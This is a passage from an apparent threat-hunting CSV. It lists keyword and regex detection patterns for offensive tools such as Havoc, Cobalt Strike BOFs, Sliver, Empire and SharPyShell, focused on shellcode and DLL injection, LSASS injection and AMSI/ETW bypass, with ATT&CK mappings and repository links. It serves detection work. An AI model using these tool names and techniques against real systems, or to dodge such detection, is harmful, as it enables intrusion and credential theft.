shellcode*",".{0,1000}inject\sshellcode.{0,1000}","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. 
It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","0","N/A","10","10","247","72","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" "*inject.spawn*",".{0,1000}inject\.spawn.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*inject.spoofaddr*",".{0,1000}inject\.spoofaddr.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*inject_dll_reflective.py*",".{0,1000}inject_dll_reflective\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*inject_dll_srdi.py*",".{0,1000}inject_dll_srdi\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - 
TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*inject_macro_word(*",".{0,1000}inject_macro_word\(.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","0","N/A","10","3","209","47","2024-03-24T16:47:03Z","2024-03-24T16:36:46Z" "*inject_shellcode.py*",".{0,1000}inject_shellcode\.py.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","1","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*inject_shellcode_self*",".{0,1000}inject_shellcode_self.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1731","318","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z" "*inject-amsiBypass *",".{0,1000}inject\-amsiBypass\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","0","N/A","10","10","366","68","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*inject-amsi-bypass*",".{0,1000}inject\-amsi\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - 
TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*inject-amsiBypass.*",".{0,1000}inject\-amsiBypass\..{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF - Bypass AMSI in a remote process with code injection.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectAmsiBypass","1","1","N/A","10","10","366","68","2023-03-08T15:54:57Z","2021-07-19T00:08:21Z" "*inject-assembly *",".{0,1000}inject\-assembly\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - 
T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","0","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*inject-assembly.cna*",".{0,1000}inject\-assembly\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" 
"*injectassembly.x64.bin*",".{0,1000}injectassembly\.x64\.bin.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*injectassembly.x64.o*",".{0,1000}injectassembly\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","Inject .NET assemblies into an existing process","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/kyleavery/inject-assembly","1","1","N/A","10","10","467","73","2022-01-19T19:15:11Z","2022-01-03T15:38:10Z" "*Inject-BypassStuff*",".{0,1000}Inject\-BypassStuff.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - 
APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-BypassUAC.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*InjectDll.cpp*",".{0,1000}InjectDll\.cpp.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*InjectDll.vcxproj*",".{0,1000}InjectDll\.vcxproj.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*injected into LSASS*",".{0,1000}injected\sinto\sLSASS.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","New-HoneyHash.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Injected! Check your listener!*",".{0,1000}Injected!\sCheck\syour\slistener!.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*InjectedCredentials.csv*",".{0,1000}InjectedCredentials\.csv.{0,1000}","offensive_tool_keyword","HoneypotBuster","Microsoft PowerShell module designed for red teams that can be used to find honeypots and honeytokens in the network or at the host","T1083 - T1059.001 - T1112","TA0007 - TA0002","N/A","N/A","Lateral Movement","https://github.com/JavelinNetworks/HoneypotBuster","1","0","N/A","8","3","273","61","2017-12-05T13:03:11Z","2017-07-22T15:40:44Z" "*injectEtwBypass*",".{0,1000}injectEtwBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","CobaltStrike BOF - Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - 
T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","10","10","271","54","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z" "*inject-etw-bypass*",".{0,1000}inject\-etw\-bypass.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*injectify*",".{0,1000}injectify.{0,1000}","offensive_tool_keyword","injectify","Perform advanced MiTM attacks on websites with ease.","T1557.001 - T1190 - T1071.001 - T1056.001","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/samdenty/injectify","1","0","N/A","N/A","7","658","118","2024-03-25T09:04:38Z","2017-11-06T17:01:50Z" "*Injecting converted DLL shellcode into remote process*",".{0,1000}Injecting\sconverted\sDLL\sshellcode\sinto\sremote\sprocess.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*Injecting Reflective DLL into remote 
process*",".{0,1000}Injecting\sReflective\sDLL\sinto\sremote\sprocess.{0,1000}","offensive_tool_keyword","SharPyShell","SharPyShell - tiny and obfuscated ASP.NET webshell for C# web","T1505.003 - T1059.007 - T1027.002 - T1027.004","TA0002 - TA0003 - TA0004 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/SharPyShell","1","0","N/A","10","10","859","144","2023-11-26T17:14:06Z","2019-03-10T22:09:40Z" "*Injecting shellcode into PID: *",".{0,1000}Injecting\sshellcode\sinto\sPID\:\s.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Injecting shellcode into the running PowerShell process*",".{0,1000}Injecting\sshellcode\sinto\sthe\srunning\sPowerShell\sprocess.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Injection done! 
Check your listener!*",".{0,1000}Injection\sdone!\sCheck\syour\slistener!.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*Injection* -ProcName lsass*",".{0,1000}Injection.{0,1000}\s\-ProcName\slsass.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - 
WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Injection\Spawn32*",".{0,1000}Injection\\Spawn32.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Injection\Spawn64*",".{0,1000}Injection\\Spawn64.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*Injection-Exploit-1.0-SNAPSHOT-all.jar*",".{0,1000}Injection\-Exploit\-1\.0\-SNAPSHOT\-all\.jar.{0,1000}","offensive_tool_keyword","POC","JNDI-Injection-Exploit is a tool for generating workable JNDI links and provide background services by starting RMI server. LDAP server and HTTP server. Using this tool allows you get JNDI links. 
you can insert these links into your POC to test vulnerability.","T1190 - T1133 - T1595 - T1132 - T1046 - T1041","TA0009 - TA0003 - TA0002 - TA0007 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/welk1n/JNDI-Injection-Exploit","1","1","N/A","N/A","10","2471","712","2023-03-22T21:23:32Z","2019-10-10T01:53:49Z" "*Injections/Traversal.txt*",".{0,1000}Injections\/Traversal\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*Injections/XSS.txt*",".{0,1000}Injections\/XSS\.txt.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*InjectLibraryClient.exe -*",".{0,1000}InjectLibraryClient\.exe\s\-.{0,1000}","offensive_tool_keyword","VectorKernel","PoCs for Kernelmode rootkit techniques research.","T1543 - T1055 - T1134 - T1564 - T1070 - T1057 - T1574 - T1562 - T1082 - T1518","TA0003 - TA0005 - TA0004 - TA0008 - TA0007","N/A","N/A","Exploitation 